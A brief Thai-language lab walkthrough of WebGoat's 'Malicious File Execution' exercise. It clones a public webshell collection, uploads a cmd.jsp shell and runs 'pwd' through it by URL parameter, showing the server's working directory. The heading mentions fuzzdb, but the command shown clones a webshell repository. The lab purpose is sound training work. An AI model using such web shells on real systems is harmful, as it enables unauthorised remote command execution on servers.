Malicious File Execution
ด่านทดสอบนี้เราจะมาลอง Upload .jsp shell เพื่อ Execute command- Install fuzzdb on ubuntu
git clone https://github.com/tennc/webshell
- upload > cmd.jsp :
- Execute command : ! /WebGoat/uploads/cmd.jsp?cmd=pwd
Output :
Command: pwd
/var/lib/tomcat6